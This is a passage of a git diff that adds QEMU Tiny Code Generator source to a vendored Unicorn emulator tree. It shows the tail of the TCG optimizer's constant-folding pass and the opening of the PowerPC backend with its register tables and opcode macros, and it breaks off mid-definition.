CASE_OP_32_64(andc): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0) { + goto do_mov3; + } + break; + CASE_OP_32_64(and): + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + if (temps[args[1]].state != TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == -1) { + goto do_mov3; + } + break; + do_mov3: + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + } + args += 3; + continue; + default: + break; + } + + /* Simplify using known-zero bits. Currently only ops with a single + output argument is supported. */ + mask = -1; + affected = -1; + switch (op) { + CASE_OP_32_64(ext8s): + if ((temps[args[1]].mask & 0x80) != 0) { + break; + } + CASE_OP_32_64(ext8u): + mask = 0xff; + goto and_const; + CASE_OP_32_64(ext16s): + if ((temps[args[1]].mask & 0x8000) != 0) { + break; + } + CASE_OP_32_64(ext16u): + mask = 0xffff; + goto and_const; + case INDEX_op_ext32s_i64: + if ((temps[args[1]].mask & 0x80000000) != 0) { + break; + } + case INDEX_op_ext32u_i64: + mask = 0xffffffffU; + goto and_const; + + CASE_OP_32_64(and): + mask = temps[args[2]].mask; + if (temps[args[2]].state == TCG_TEMP_CONST) { + and_const: + affected = temps[args[1]].mask & ~mask; + } + mask = temps[args[1]].mask & mask; + break; + + CASE_OP_32_64(andc): + /* Known-zeros does not imply known-ones. Therefore unless + args[2] is constant, we can't infer anything from it. */ + if (temps[args[2]].state == TCG_TEMP_CONST) { + mask = ~temps[args[2]].mask; + goto and_const; + } + /* But we certainly know nothing outside args[1] may be set. 
*/ + mask = temps[args[1]].mask; + break; + + case INDEX_op_sar_i32: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 31; + mask = (int32_t)temps[args[1]].mask >> tmp; + } + break; + case INDEX_op_sar_i64: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 63; + mask = (int64_t)temps[args[1]].mask >> tmp; + } + break; + + case INDEX_op_shr_i32: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 31; + mask = (uint32_t)temps[args[1]].mask >> tmp; + } + break; + case INDEX_op_shr_i64: + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & 63; + mask = (uint64_t)temps[args[1]].mask >> tmp; + } + break; + + case INDEX_op_trunc_shr_i32: + mask = (uint64_t)temps[args[1]].mask >> args[2]; + break; + + CASE_OP_32_64(shl): + if (temps[args[2]].state == TCG_TEMP_CONST) { + tmp = temps[args[2]].val & (TCG_TARGET_REG_BITS - 1); + mask = temps[args[1]].mask << tmp; + } + break; + + CASE_OP_32_64(neg): + /* Set to 1 all bits to the left of the rightmost. */ + mask = 0-(temps[args[1]].mask & (0-temps[args[1]].mask)); + break; + + CASE_OP_32_64(deposit): + mask = (tcg_target_ulong)deposit64(temps[args[1]].mask, args[3], args[4], + temps[args[2]].mask); + break; + + CASE_OP_32_64(or): + CASE_OP_32_64(xor): + mask = temps[args[1]].mask | temps[args[2]].mask; + break; + + CASE_OP_32_64(setcond): + case INDEX_op_setcond2_i32: + mask = 1; + break; + + CASE_OP_32_64(movcond): + mask = temps[args[3]].mask | temps[args[4]].mask; + break; + + CASE_OP_32_64(ld8u): + mask = 0xff; + break; + CASE_OP_32_64(ld16u): + mask = 0xffff; + break; + case INDEX_op_ld32u_i64: + mask = 0xffffffffu; + break; + + CASE_OP_32_64(qemu_ld): + { + TCGMemOp mop = args[nb_oargs + nb_iargs]; + if (!(mop & MO_SIGN)) { + mask = (2ULL << ((8 << (mop & MO_SIZE)) - 1)) - 1; + } + } + break; + + default: + break; + } + + /* 32-bit ops generate 32-bit results. 
For the result is zero test + below, we can ignore high bits, but for further optimizations we + need to record that the high bits contain garbage. */ + partmask = mask; + if (!(def->flags & TCG_OPF_64BIT)) { + mask |= ~(tcg_target_ulong)0xffffffffu; + partmask &= 0xffffffffu; + affected &= 0xffffffffu; + } + + if (partmask == 0) { + assert(nb_oargs == 1); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += nb_args; + gen_args += 2; + continue; + } + if (affected == 0) { + assert(nb_oargs == 1); + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else if (temps[args[1]].state != TCG_TEMP_CONST) { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + } else { + tcg_opt_gen_movi(s, op_index, gen_args, op, + args[0], temps[args[1]].val); + gen_args += 2; + } + args += nb_args; + continue; + } + + /* Simplify expression for "op r, a, 0 => movi r, 0" cases */ + switch (op) { + CASE_OP_32_64(and): + CASE_OP_32_64(mul): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + if ((temps[args[2]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0)) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + args += 3; + gen_args += 2; + continue; + } + break; + default: + break; + } + + /* Simplify expression for "op r, a, a => mov r, a" cases */ + switch (op) { + CASE_OP_32_64(or): + CASE_OP_32_64(and): + if (temps_are_copies(s, args[1], args[2])) { + if (temps_are_copies(s, args[0], args[1])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, + args[0], args[1]); + gen_args += 2; + } + args += 3; + continue; + } + break; + default: + break; + } + + /* Simplify expression for "op r, a, a => movi r, 0" cases */ + switch (op) { + CASE_OP_32_64(andc): + CASE_OP_32_64(sub): + CASE_OP_32_64(xor): + if (temps_are_copies(s, args[1], args[2])) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], 0); + gen_args += 2; + args += 3; + continue; + 
} + break; + default: + break; + } + + /* Propagate constants through copy operations and do constant + folding. Constants will be substituted to arguments by register + allocator where needed and possible. Also detect copies. */ + switch (op) { + CASE_OP_32_64(mov): + if (temps_are_copies(s, args[0], args[1])) { + args += 2; + s->gen_opc_buf[op_index] = INDEX_op_nop; + break; + } + if (temps[args[1]].state != TCG_TEMP_CONST) { + tcg_opt_gen_mov(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + args += 2; + break; + } + /* Source argument is constant. Rewrite the operation and + let movi case handle it. */ + args[1] = temps[args[1]].val; + /* fallthrough */ + CASE_OP_32_64(movi): + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], args[1]); + gen_args += 2; + args += 2; + break; + + CASE_OP_32_64(not): + CASE_OP_32_64(neg): + CASE_OP_32_64(ext8s): + CASE_OP_32_64(ext8u): + CASE_OP_32_64(ext16s): + CASE_OP_32_64(ext16u): + case INDEX_op_ext32s_i64: + case INDEX_op_ext32u_i64: + if (temps[args[1]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, 0); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 2; + break; + } + goto do_default; + + case INDEX_op_trunc_shr_i32: + if (temps[args[1]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, args[2]); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 3; + break; + } + goto do_default; + + CASE_OP_32_64(add): + CASE_OP_32_64(sub): + CASE_OP_32_64(mul): + CASE_OP_32_64(or): + CASE_OP_32_64(and): + CASE_OP_32_64(xor): + CASE_OP_32_64(shl): + CASE_OP_32_64(shr): + CASE_OP_32_64(sar): + CASE_OP_32_64(rotl): + CASE_OP_32_64(rotr): + CASE_OP_32_64(andc): + CASE_OP_32_64(orc): + CASE_OP_32_64(eqv): + CASE_OP_32_64(nand): + CASE_OP_32_64(nor): + CASE_OP_32_64(muluh): + CASE_OP_32_64(mulsh): + CASE_OP_32_64(div): + CASE_OP_32_64(divu): + CASE_OP_32_64(rem): + 
CASE_OP_32_64(remu): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST) { + tmp = do_constant_folding(s, op, temps[args[1]].val, + temps[args[2]].val); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 3; + break; + } + goto do_default; + + CASE_OP_32_64(deposit): + if (temps[args[1]].state == TCG_TEMP_CONST + && temps[args[2]].state == TCG_TEMP_CONST) { + tmp = (TCGArg)deposit64(temps[args[1]].val, args[3], args[4], + temps[args[2]].val); + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 5; + break; + } + goto do_default; + + CASE_OP_32_64(setcond): + tmp = do_constant_folding_cond(s, op, args[1], args[2], args[3]); + if (tmp != 2) { + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + args += 4; + break; + } + goto do_default; + + CASE_OP_32_64(brcond): + tmp = do_constant_folding_cond(s, op, args[0], args[1], args[2]); + if (tmp != 2) { + if (tmp) { + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_br; + gen_args[0] = args[3]; + gen_args += 1; + } else { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } + args += 4; + break; + } + goto do_default; + + CASE_OP_32_64(movcond): + tmp = do_constant_folding_cond(s, op, args[1], args[2], args[5]); + if (tmp != 2) { + if (temps_are_copies(s, args[0], args[4-tmp])) { + s->gen_opc_buf[op_index] = INDEX_op_nop; + } else if (temps[args[4-tmp]].state == TCG_TEMP_CONST) { + tcg_opt_gen_movi(s, op_index, gen_args, op, + args[0], temps[args[4-tmp]].val); + gen_args += 2; + } else { + tcg_opt_gen_mov(s, op_index, gen_args, op, + args[0], args[4-tmp]); + gen_args += 2; + } + args += 6; + break; + } + goto do_default; + + case INDEX_op_add2_i32: + case INDEX_op_sub2_i32: + if (temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[4]].state == TCG_TEMP_CONST + && temps[args[5]].state == TCG_TEMP_CONST) { + uint32_t al = 
temps[args[2]].val; + uint32_t ah = temps[args[3]].val; + uint32_t bl = temps[args[4]].val; + uint32_t bh = temps[args[5]].val; + uint64_t a = ((uint64_t)ah << 32) | al; + uint64_t b = ((uint64_t)bh << 32) | bl; + TCGArg rl, rh; + + if (op == INDEX_op_add2_i32) { + a += b; + } else { + a -= b; + } + + /* We emit the extra nop when we emit the add2/sub2. */ + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + + rl = args[0]; + rh = args[1]; + tcg_opt_gen_movi(s, op_index, &gen_args[0], + op, rl, (uint32_t)a); + tcg_opt_gen_movi(s, ++op_index, &gen_args[2], + op, rh, (uint32_t)(a >> 32)); + gen_args += 4; + args += 6; + break; + } + goto do_default; + + case INDEX_op_mulu2_i32: + if (temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST) { + uint32_t a = temps[args[2]].val; + uint32_t b = temps[args[3]].val; + uint64_t r = (uint64_t)a * b; + TCGArg rl, rh; + + /* We emit the extra nop when we emit the mulu2. */ + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + + rl = args[0]; + rh = args[1]; + tcg_opt_gen_movi(s, op_index, &gen_args[0], + op, rl, (uint32_t)r); + tcg_opt_gen_movi(s, ++op_index, &gen_args[2], + op, rh, (uint32_t)(r >> 32)); + gen_args += 4; + args += 4; + break; + } + goto do_default; + + case INDEX_op_brcond2_i32: + tmp = do_constant_folding_cond2(s, &args[0], &args[2], args[4]); + if (tmp != 2) { + if (tmp) { + do_brcond_true: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_br; + gen_args[0] = args[5]; + gen_args += 1; + } else { + do_brcond_false: + s->gen_opc_buf[op_index] = INDEX_op_nop; + } + } else if ((args[4] == TCG_COND_LT || args[4] == TCG_COND_GE) + && temps[args[2]].state == TCG_TEMP_CONST + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[2]].val == 0 + && temps[args[3]].val == 0) { + /* Simplify LT/GE comparisons vs zero to a single compare + vs the high word of the input. 
*/ + do_brcond_high: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_brcond_i32; + gen_args[0] = args[1]; + gen_args[1] = args[3]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[4] == TCG_COND_EQ) { + /* Simplify EQ comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[0], args[2], TCG_COND_EQ); + if (tmp == 0) { + goto do_brcond_false; + } else if (tmp == 1) { + goto do_brcond_high; + } + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[1], args[3], TCG_COND_EQ); + if (tmp == 0) { + goto do_brcond_false; + } else if (tmp != 1) { + goto do_default; + } + do_brcond_low: + reset_all_temps(s, nb_temps); + s->gen_opc_buf[op_index] = INDEX_op_brcond_i32; + gen_args[0] = args[0]; + gen_args[1] = args[2]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[4] == TCG_COND_NE) { + /* Simplify NE comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[0], args[2], TCG_COND_NE); + if (tmp == 0) { + goto do_brcond_high; + } else if (tmp == 1) { + goto do_brcond_true; + } + tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, + args[1], args[3], TCG_COND_NE); + if (tmp == 0) { + goto do_brcond_low; + } else if (tmp == 1) { + goto do_brcond_true; + } + goto do_default; + } else { + goto do_default; + } + args += 6; + break; + + case INDEX_op_setcond2_i32: + tmp = do_constant_folding_cond2(s, &args[1], &args[3], args[5]); + if (tmp != 2) { + do_setcond_const: + tcg_opt_gen_movi(s, op_index, gen_args, op, args[0], tmp); + gen_args += 2; + } else if ((args[5] == TCG_COND_LT || args[5] == TCG_COND_GE) + && temps[args[3]].state == TCG_TEMP_CONST + && temps[args[4]].state == TCG_TEMP_CONST + && temps[args[3]].val == 0 + && temps[args[4]].val == 0) { + /* Simplify LT/GE comparisons vs zero to a single compare + vs the high word of the input. 
*/ + do_setcond_high: + s->gen_opc_buf[op_index] = INDEX_op_setcond_i32; + reset_temp(s, args[0]); + temps[args[0]].mask = 1; + gen_args[0] = args[0]; + gen_args[1] = args[2]; + gen_args[2] = args[4]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[5] == TCG_COND_EQ) { + /* Simplify EQ comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[1], args[3], TCG_COND_EQ); + if (tmp == 0) { + goto do_setcond_const; + } else if (tmp == 1) { + goto do_setcond_high; + } + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[2], args[4], TCG_COND_EQ); + if (tmp == 0) { + goto do_setcond_high; + } else if (tmp != 1) { + goto do_default; + } + do_setcond_low: + reset_temp(s, args[0]); + temps[args[0]].mask = 1; + s->gen_opc_buf[op_index] = INDEX_op_setcond_i32; + gen_args[0] = args[0]; + gen_args[1] = args[1]; + gen_args[2] = args[3]; + gen_args[3] = args[5]; + gen_args += 4; + } else if (args[5] == TCG_COND_NE) { + /* Simplify NE comparisons where one of the pairs + can be simplified. */ + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[1], args[3], TCG_COND_NE); + if (tmp == 0) { + goto do_setcond_high; + } else if (tmp == 1) { + goto do_setcond_const; + } + tmp = do_constant_folding_cond(s, INDEX_op_setcond_i32, + args[2], args[4], TCG_COND_NE); + if (tmp == 0) { + goto do_setcond_low; + } else if (tmp == 1) { + goto do_setcond_const; + } + goto do_default; + } else { + goto do_default; + } + args += 6; + break; + + case INDEX_op_call: + if (!(args[nb_oargs + nb_iargs + 1] + & (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS))) { + for (i = 0; i < nb_globals; i++) { + reset_temp(s, i); + } + } + goto do_reset_output; + + default: + do_default: + /* Default case: we know nothing about operation (or were unable + to compute the operation result) so no propagation is done. 
+ We trash everything if the operation is the end of a basic + block, otherwise we only trash the output args. "mask" is + the non-zero bits mask for the first output arg. */ + if (def->flags & TCG_OPF_BB_END) { + reset_all_temps(s, nb_temps); + } else { + do_reset_output: + for (i = 0; i < nb_oargs; i++) { + if (args[i] >= TCG_MAX_TEMPS) { + continue; + } + reset_temp(s, args[i]); + /* Save the corresponding known-zero bits mask for the + first output argument (only one supported so far). */ + if (i == 0) { + temps[args[i]].mask = mask; + } + } + } + for (i = 0; i < nb_args; i++) { + gen_args[i] = args[i]; + } + args += nb_args; + gen_args += nb_args; + break; + } + } + + return gen_args; +} + +TCGArg *tcg_optimize(TCGContext *s, uint16_t *tcg_opc_ptr, + TCGArg *args, TCGOpDef *tcg_op_defs) +{ + TCGArg *res; + res = tcg_constant_folding(s, tcg_opc_ptr, args, tcg_op_defs); + return res; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c new file mode 100644 index 0000000..cd7aabd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ppc/tcg-target.c @@ -0,0 +1,2672 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. 
+ * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +#if defined _CALL_DARWIN || defined __APPLE__ +#define TCG_TARGET_CALL_DARWIN +#endif +#ifdef _CALL_SYSV +# define TCG_TARGET_CALL_ALIGN_ARGS 1 +#endif + +/* For some memory operations, we need a scratch that isn't R0. For the AIX + calling convention, we can re-use the TOC register since we'll be reloading + it at every call. Otherwise R12 will do nicely as neither a call-saved + register nor a parameter register. */ +#ifdef _CALL_AIX +# define TCG_REG_TMP1 TCG_REG_R2 +#else +# define TCG_REG_TMP1 TCG_REG_R12 +#endif + +/* For the 64-bit target, we don't like the 5 insn sequence needed to build + full 64-bit addresses. Better to have a base register to which we can + apply a 32-bit displacement. + + There are generally three items of interest: + (1) helper functions in the main executable, + (2) TranslationBlock data structures, + (3) the return address in the epilogue. + + For user-only, we USE_STATIC_CODE_GEN_BUFFER, so the code_gen_buffer + will be inside the main executable, and thus near enough to make a + pointer to the epilogue be within 2GB of all helper functions. + + For softmmu, we'll let the kernel choose the address of code_gen_buffer, + and odds are it'll be somewhere close to the main malloc arena, and so + a pointer to the epilogue will be within 2GB of the TranslationBlocks. + + For --enable-pie, everything will be kinda near everything else, + somewhere in high memory. 
+ + Thus we choose to keep the return address in a call-saved register. */ +#define TCG_REG_RA TCG_REG_R31 +#define USE_REG_RA (TCG_TARGET_REG_BITS == 64) + +/* Shorthand for size of a pointer. Avoid promotion to unsigned. */ +#define SZP ((int)sizeof(void *)) + +/* Shorthand for size of a register. */ +#define SZR (TCG_TARGET_REG_BITS / 8) + +#define TCG_CT_CONST_S16 0x100 +#define TCG_CT_CONST_U16 0x200 +#define TCG_CT_CONST_S32 0x400 +#define TCG_CT_CONST_U32 0x800 +#define TCG_CT_CONST_ZERO 0x1000 +#define TCG_CT_CONST_MONE 0x2000 + +static tcg_insn_unit *tb_ret_addr; + +#ifndef GUEST_BASE +#define GUEST_BASE 0 +#endif + +#include "elf.h" +static bool have_isa_2_06; +#define HAVE_ISA_2_06 have_isa_2_06 +#define HAVE_ISEL have_isa_2_06 + +#ifdef CONFIG_USE_GUEST_BASE +#define TCG_GUEST_BASE_REG 30 +#else +#define TCG_GUEST_BASE_REG 0 +#endif + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "r0", + "r1", + "r2", + "r3", + "r4", + "r5", + "r6", + "r7", + "r8", + "r9", + "r10", + "r11", + "r12", + "r13", + "r14", + "r15", + "r16", + "r17", + "r18", + "r19", + "r20", + "r21", + "r22", + "r23", + "r24", + "r25", + "r26", + "r27", + "r28", + "r29", + "r30", + "r31" +}; +#endif + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_R14, /* call saved registers */ + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R12, /* call clobbered, non-arguments */ + TCG_REG_R11, + TCG_REG_R2, + TCG_REG_R13, + TCG_REG_R10, /* call clobbered, arguments */ + TCG_REG_R9, + TCG_REG_R8, + TCG_REG_R7, + TCG_REG_R6, + TCG_REG_R5, + TCG_REG_R4, + TCG_REG_R3, +}; + +static const int tcg_target_call_iarg_regs[] = { + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10 +}; + 
+static const int tcg_target_call_oarg_regs[] = { + TCG_REG_R3, + TCG_REG_R4 +}; + +static const int tcg_target_callee_save_regs[] = { +#ifdef TCG_TARGET_CALL_DARWIN + TCG_REG_R11, +#endif + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, /* currently used for the global env */ + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31 +}; + +static inline bool in_range_b(tcg_target_long target) +{ + return target == sextract64(target, 0, 26); +} + +static uint32_t reloc_pc24_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); + assert(in_range_b(disp)); + return disp & 0x3fffffc; +} + +static void reloc_pc24(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = (*pc & ~0x3fffffc) | reloc_pc24_val(pc, target); +} + +static uint16_t reloc_pc14_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); + assert(disp == (int16_t) disp); + return disp & 0xfffc; +} + +static void reloc_pc14(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = (*pc & ~0xfffc) | reloc_pc14_val(pc, target); +} + +static inline void tcg_out_b_noaddr(TCGContext *s, int insn) +{ + unsigned retrans = *s->code_ptr & 0x3fffffc; + tcg_out32(s, insn | retrans); +} + +static inline void tcg_out_bc_noaddr(TCGContext *s, int insn) +{ + unsigned retrans = *s->code_ptr & 0xfffc; + tcg_out32(s, insn | retrans); +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + tcg_insn_unit *target = (tcg_insn_unit *)value; + + assert(addend == 0); + switch (type) { + case R_PPC_REL14: + reloc_pc14(code_ptr, target); + break; + case R_PPC_REL24: + reloc_pc24(code_ptr, target); + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const 
char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch (ct_str[0]) { + case 'A': case 'B': case 'C': case 'D': + ct->ct |= TCG_CT_REG; + tcg_regset_set_reg(ct->u.regs, 3 + ct_str[0] - 'A'); + break; + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + break; + case 'L': /* qemu_ld constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); +#ifdef CONFIG_SOFTMMU + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); +#endif + break; + case 'S': /* qemu_st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); +#ifdef CONFIG_SOFTMMU + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R6); +#endif + break; + case 'I': + ct->ct |= TCG_CT_CONST_S16; + break; + case 'J': + ct->ct |= TCG_CT_CONST_U16; + break; + case 'M': + ct->ct |= TCG_CT_CONST_MONE; + break; + case 'T': + ct->ct |= TCG_CT_CONST_S32; + break; + case 'U': + ct->ct |= TCG_CT_CONST_U32; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } + + /* The only 32-bit constraint we use aside from + TCG_CT_CONST is TCG_CT_CONST_S16. 
*/ + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_MONE) && val == -1) { + return 1; + } + return 0; +} + +#define OPCD(opc) ((opc)<<26) +#define XO19(opc) (OPCD(19)|((opc)<<1)) +#define MD30(opc) (OPCD(30)|((opc)<<2)) +#define MDS30(opc) (OPCD(30)|((opc)<<1)) +#define XO31(opc) (OPCD(31)|((opc)<<1)) +#define XO58(opc) (OPCD(58)|(opc)) +#define XO62(opc) (OPCD(62)|(opc)) + +#define B OPCD( 18) +#define BC OPCD( 16) +#define LBZ OPCD( 34) +#define LHZ OPCD( 40) +#define LHA OPCD( 42) +#define LWZ OPCD( 32) +#define STB OPCD( 38) +#define STH OPCD( 44) +#define STW OPCD( 36) + +#define STD XO62( 0) +#define STDU XO62( 1) +#define STDX XO31(149) + +#define LD XO58( 0) +#define LDX XO31( 21) +#define LDU XO58( 1) +#define LWA XO58( 2) +#define LWAX XO31(341) + +#define ADDIC OPCD( 12) +#define ADDI OPCD( 14) +#define ADDIS OPCD( 15) +#define ORI OPCD( 24) +#define ORIS OPCD( 25) +#define XORI OPCD( 26) +#define XORIS OPCD( 27) +#define ANDI OPCD( 28) +#define ANDIS OPCD( 29) +#define MULLI OPCD( 7) +#define CMPLI OPCD( 10) +#define CMPI OPCD( 11) +#define SUBFIC OPCD( 8) + +#define LWZU OPCD( 33) +#define STWU OPCD( 37) + +#define RLWIMI OPCD( 20) +#define RLWINM OPCD( 21) +#define RLWNM OPCD( 23) + +#define RLDICL MD30( 0) +#define RLDICR MD30( 1) +#define RLDIMI MD30( 3) +#define RLDCL MDS30( 8) + +#define BCLR XO19( 16) +#define BCCTR XO19(528) +#define CRAND XO19(257) +#define CRANDC XO19(129) +#define CRNAND XO19(225) +#define CROR XO19(449) +#define CRNOR XO19( 33) + +#define EXTSB XO31(954) +#define EXTSH XO31(922) +#define EXTSW XO31(986) +#define ADD XO31(266) 
+#define ADDE XO31(138) +#define ADDME XO31(234) +#define ADDZE XO31(202) +#define ADDC XO31( 10) +#define AND XO31( 28) +#define SUBF XO31( 40) +#define SUBFC XO31( 8) +#define SUBFE XO31(136) +#define SUBFME XO31(232) +#define SUBFZE XO31(200) +#define OR XO31(444) +#define XOR XO31(316) +#define MULLW XO31(235) +#define MULHW XO31( 75) +#define MULHWU XO31( 11) +#define DIVW XO31(491) +#define DIVWU XO31(459) +#define CMP XO31( 0) +#define CMPL XO31( 32) +#define LHBRX XO31(790) +#define LWBRX XO31(534) +#define LDBRX XO31(532) +#define STHBRX XO31(918) +#define STWBRX XO31(662) +#define STDBRX XO31(660) +#define MFSPR XO31(339) +#define MTSPR XO31(467) +#define SRAWI XO31(824) +#define NEG XO31(104) +#define MFCR XO31( 19) +#define MFOCRF (MFCR | (1u << 20)) +#define NOR XO31(124) +#define CNTLZW XO31( 26) +#define CNTLZD XO31( 58) +#define ANDC XO31( 60) +#define ORC XO31(412) +#define EQV XO31(284) +#define NAND XO31(476) +#define ISEL XO31( 15) + +#define MULLD XO31(233) +#define MULHD XO31( 73) +#define 